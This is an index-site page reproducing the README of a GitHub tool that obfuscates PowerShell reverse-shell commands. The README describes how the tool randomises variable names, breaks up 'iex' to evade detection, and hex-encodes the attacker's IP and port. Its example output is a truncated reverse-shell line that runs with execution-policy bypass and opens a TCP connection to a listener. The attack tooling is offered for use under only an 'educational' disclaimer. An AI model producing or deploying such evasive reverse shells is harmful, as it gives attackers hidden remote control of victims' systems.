Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mrmtwoj/obfuscationpowershellreverseshell

Obfuscation Script for PowerShell Commands
https://github.com/mrmtwoj/obfuscationpowershellreverseshell

obfuscation obfuscation-detection obfuscation-script obfuscation-tool powershell powershell-module powershell-reverse-shell powershell-script reverse-shell shell shell-script

Last synced: 8 days ago
JSON representation

Obfuscation Script for PowerShell Commands

Host: GitHub
URL: https://github.com/mrmtwoj/obfuscationpowershellreverseshell
Owner: mrmtwoj
Created: 2024-10-27T06:14:08.000Z (about 2 months ago)
Default Branch: main
Last Pushed: 2024-11-20T09:13:52.000Z (about 1 month ago)
Last Synced: 2024-12-14T21:11:40.784Z (8 days ago)
Topics: obfuscation, obfuscation-detection, obfuscation-script, obfuscation-tool, powershell, powershell-module, powershell-reverse-shell, powershell-script, reverse-shell, shell, shell-script
Language: Python
Homepage: https://acyber.ir
Size: 10.7 KB
Stars: 0
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# Obfuscation Script for PowerShell Commands
This Python script takes a PowerShell command, obfuscates it, and replaces certain parts like IP addresses and ports with user-provided values in hexadecimal format. It is designed for users who want to modify PowerShell scripts for testing purposes or to better understand obfuscation techniques.

## Table of Contents

* Overview
* Prerequisites
* Installation
* Usage
* Functions Explanation
* get_user_input()
* obfuscate_script()
* random_string()
* replace_ip_and_port()
* ip_to_hex()
* convert_ips_to_hex()
* port_to_hex()
* convert_ports_to_hex()
* main()
* Example
* Disclaimer

## Overview
This script allows the user to input an IP address and port, then modifies a provided PowerShell script by:

* Obfuscating variable names.
* Replacing occurrences of iex to i''ex to make detection harder.
* Replacing placeholders for IP and port.
* Converting IP addresses and port numbers into hexadecimal format.

## Prerequisites
* Python 3.x
* Basic understanding of regular expressions and PowerShell scripting.

## Installation
Clone the repository and navigate to the project folder:
```bash
git https://github.com/mrmtwoj/ObfuscationPowerShellReverseshell.git
cd ObfuscationPowerShellReverseshell
```
## Usage
Run the script using the command:
```bash
python obfuscate_script.py

```
Follow the prompts to input the IP address and port, and the script will display the obfuscated PowerShell command.

## Functions Explanation
* get_user_input()
Purpose: Accepts user input for IP address and port, validating their formats.
## Validation:
+ Ensures the IP address is in the correct format (e.g., 192.168.1.1).
+ Ensures the port number is between 1 and 65535.
+ Raises: ValueError if the input is invalid.

## obfuscate_script()
* Purpose: Obfuscates variable names in the script and alters specific patterns.
## Details:
+ Uses regex to find all variables (excluding $PSHOME) and replaces them with randomly generated names.
+ Replaces occurrences of iex with i''ex to bypass some detection mechanisms.
+ Replaces occurrences of 'PS' with random UUID-like strings.

## random_string()
+ Purpose: Generates a random alphanumeric string of a specified length.
+ Parameters: length (default is 10).
+ Returns: A random string using ascii_letters and digits.

## replace_ip_and_port()
+ Purpose: Replaces placeholders for IP (*LHOST*) and port (*LPORT*) with the user-provided values.
+ Parameters: script, ip, port.

## ip_to_hex()
+ Purpose: Converts an IP address into its hexadecimal representation.
+ Parameters: ip (e.g., 192.168.1.1).
+ Returns: Hexadecimal string representation of the IP address.

## convert_ips_to_hex()
+ Purpose: Finds all IP addresses in the script and converts them to hexadecimal format.
+ Parameters: script.

## port_to_hex()
+ Purpose: Converts a port number to its hexadecimal representation.
+ Parameters: port.
+ Returns: Hexadecimal string of the port number.

## convert_ports_to_hex()
+ Purpose: Finds and converts all port numbers in the script (excluding 65535) to hexadecimal.
+ Parameters: script.

## main()
Purpose: The entry point of the script that coordinates user input, obfuscation, and replacements.

## Workflow:
+ Gets user input for IP and port.
+ Applies obfuscation to the PowerShell script.
+ Replaces placeholders with user inputs.
+ Converts IPs and ports to their hexadecimal representations.
+ Prints the final modified script.

## Example
Here’s an example of how to use the script:
```bash
Enter IP address: 192.168.1.10
Enter port: 8080
```

## Output (truncated for brevity):
```bash
Start-Process $PSHOME\powershell.exe -ArgumentList {-ep bypass -nop $client = New-Object System.Net.Sockets.TCPClient('0xc0a8010a',0x1f90);$stream = ...
```

## Disclaimer
This script is intended for educational purposes only. The use of this script for malicious purposes is strictly prohibited. Always ensure you have permission before testing on any network or system.